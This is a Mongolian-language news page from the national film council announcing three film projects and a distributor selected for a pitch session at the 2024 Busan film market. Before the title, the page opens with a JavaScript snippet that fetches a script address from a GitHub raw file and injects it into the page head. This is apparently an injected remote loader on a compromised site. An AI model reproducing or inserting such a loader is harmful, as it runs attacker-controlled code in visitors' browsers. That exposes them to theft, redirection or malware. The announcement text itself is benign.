;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); 29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСЛҮҮД ШАЛГАРЛАА - Mongolian National Film Council
29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСЛҮҮД ШАЛГАРЛАА

29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСЛҮҮД ШАЛГАРЛАА

Соёл, спорт, аялал жуулчлал, залуучуудын яамны харьяа Кино Урлагийн Зөвлөл нь 2024 оны 10 дугаар сарын 02-ноос 11-ний өдрүүдэд болох 29 дахь удаагийн Пусаны Олон улсын кино наадмын дэргэдэх “Asian Contents & Film Market” кино маркетын хүрээнд “Mongolian Pitch Session in Busan” арга хэмжээг зохион байгуулах гэж байна.

Тус арга хэмжээнд танилцуулах уран бүтээлчдийн төслийг 2024 оны 7 дугаар сарын 18-наас 2024 оны 8 дугаар сарын 05-ны өдрүүдийн хооронд нээлттэй хүлээн авсан бөгөөд нийт 8 уран бүтээлч төслийн материал ирүүлжээ.

Энэ сонгон шалгаруулалтын хүрээнд Кино Урлагийн зөвлөлийн 2024 оны 8 дугаар сарын 06-ны өдрийн ээлжит хуралдаанд хүсэлт ирүүлсэн уран бүтээлчид төслөө танилцуулсан ба дараах 3 кино төсөл шалгарлаа.
Үүнд:

  • “ГОВЬД ТОХИОЛДСОН БУДЛИАНТ ЯВДАЛ” уран сайхны кино төсөл, Найруулагч Л.Бат-Амгалан, продюсер Г.Номин
  • “БАГА ХЭМЭЭХ ИХ ХҮН” баримтат уран сайхны кино төсөл, Найруулагч С.Баттулга, продюсер С.Сумъяа
  • “ЭЦЭГ ТӨР” уран сайхны кино төсөл, Найруулагч Б.Баатар, продюсер С.Ангараг

Түүнчлэн 29 дахь удаагийн Пусаны Олон улсын кино наадмын дэргэдэх “Asian Contents & Film Market” кино маркетын хүрээнд хамтран оролцох хүсэлтэй кино түгээлтийн компанийн нээлттэй сонгон шалгаруулалтыг 2024 оны 7 дугаар сарын 18-ний өдрөөс 2024 оны 8 дугаар сарын 05-ныг хүртэлх хугацаанд зарласан. Тус сонгон шалгаруулалтыг Кино Урлагийн зөвлөлийн 2024 оны 8 сарын 06-ны өдрийн ээлжит хуралдаанаар хэлэлцэж, кино түгээлтийн 1 компани шалгарлаа. Үүнд:

  • Амиланэ ХХК

Кино урлагийн зөвлөлөөс зарласан сонгон шалгаруулалтад оролцож, төслөө ирүүлсэн нийт уран бүтээлчдэд талархал илэрхийлье.